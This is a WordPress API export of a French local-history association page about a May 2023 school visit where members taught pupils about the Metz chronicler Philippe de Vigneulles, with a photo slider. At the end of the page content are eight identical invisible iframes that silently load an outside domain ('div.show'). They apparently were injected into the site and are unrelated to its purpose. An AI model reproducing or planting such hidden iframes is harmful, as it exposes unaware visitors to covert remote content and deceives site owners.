{"id":6864,"date":"2023-05-09T08:27:17","date_gmt":"2023-05-09T06:27:17","guid":{"rendered":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6864"},"modified":"2023-05-09T08:38:35","modified_gmt":"2023-05-09T06:38:35","slug":"intervention-en-classe-a-lorry-les-metz","status":"publish","type":"page","link":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6864","title":{"rendered":"Intervention en classe \u00e0 Lorry-l\u00e8s-Metz"},"content":{"rendered":"<h2>4\u00a0mai\u00a02023<\/h2>\n<p>Lorry-l\u00e8s-Metz \u00ab\u00a0au fil du temps \u00bb est all\u00e9 faire d\u00e9couvrir Philippe de\u00a0Vigneulles aux enfants de CE2 et CM2 du village. Aimablement re\u00e7us par la directrice Madame Dutheil, et l\u2019enseignant des CM2, monsieur Bedel, la pr\u00e9sidente, Claudine Kester-Elghozi, a pr\u00e9sent\u00e9 l\u2019association et ses objectifs de pr\u00e9servation de m\u00e9moire et de patrimoine locaux. Andr\u00e9 De Pizzol, un des historiens du comit\u00e9, passionn\u00e9 d\u2019Histoire, a tout d\u2019abord situ\u00e9 sur la frise du temps l\u2019\u00e9poque du chroniqueur messin et son contexte soci\u00e9tal. Apr\u00e8s quelques questions-r\u00e9ponses, il a racont\u00e9 la vie aventureuse du chroniqueur, d\u00e9taill\u00e9 ses voyages et son m\u00e9tier. Les deux heures consacr\u00e9es \u00e0 ces rencontres ont \u00e9t\u00e9 fructueuses pour tous.<\/p>\n<p>Photos Claudine\u00a0Kester-Elghozi<\/p>\n<div id=\"metaslider-id-6866\" style=\"width: 100%; margin: 0 auto;\" class=\"ml-slider-3-108-0 metaslider metaslider-responsive metaslider-6866 ml-slider has-dots-nav ms-theme-default\" role=\"region\" aria-label=\"Intervention classe Lorry\" data-height=\"600\" data-width=\"800\">\n    <div id=\"metaslider_container_6866\">\n        <ul id='metaslider_6866' class='rslides'>\n            <li aria-roledescription='slide' aria-labelledby='slide-0'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/05\/A01.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/05\/A01-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6866 slide-6867 msDefaultImage\" title=\"A01\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-1'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/05\/A02.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/05\/A02-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6866 slide-6868 msDefaultImage\" title=\"A02\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-2'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/05\/A03.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/05\/A03-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6866 slide-6869 msDefaultImage\" title=\"A03\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-3'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/05\/A04.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/05\/A04-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6866 slide-6870 msDefaultImage\" title=\"A04\" \/><\/a><\/li>\n        <\/ul>\n        \n    <\/div>\n<\/div>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6688\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-378\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/retour.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>4\u00a0mai\u00a02023 Lorry-l\u00e8s-Metz \u00ab\u00a0au fil du temps \u00bb est all\u00e9 faire d\u00e9couvrir Philippe de\u00a0Vigneulles aux enfants de CE2 et CM2 du village. Aimablement re\u00e7us par la directrice Madame Dutheil, et l\u2019enseignant des CM2, monsieur Bedel, la pr\u00e9sidente, Claudine Kester-Elghozi, a pr\u00e9sent\u00e9&hellip; <\/p>\n","protected":false},"author":1,"featured_media":0,"parent":6688,"menu_order":5,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_mc_calendar":[],"footnotes":""},"class_list":["post-6864","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/6864","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6864"}],"version-history":[{"count":9,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/6864\/revisions"}],"predecessor-version":[{"id":6881,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/6864\/revisions\/6881"}],"up":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/6688"}],"wp:attachment":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6864"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}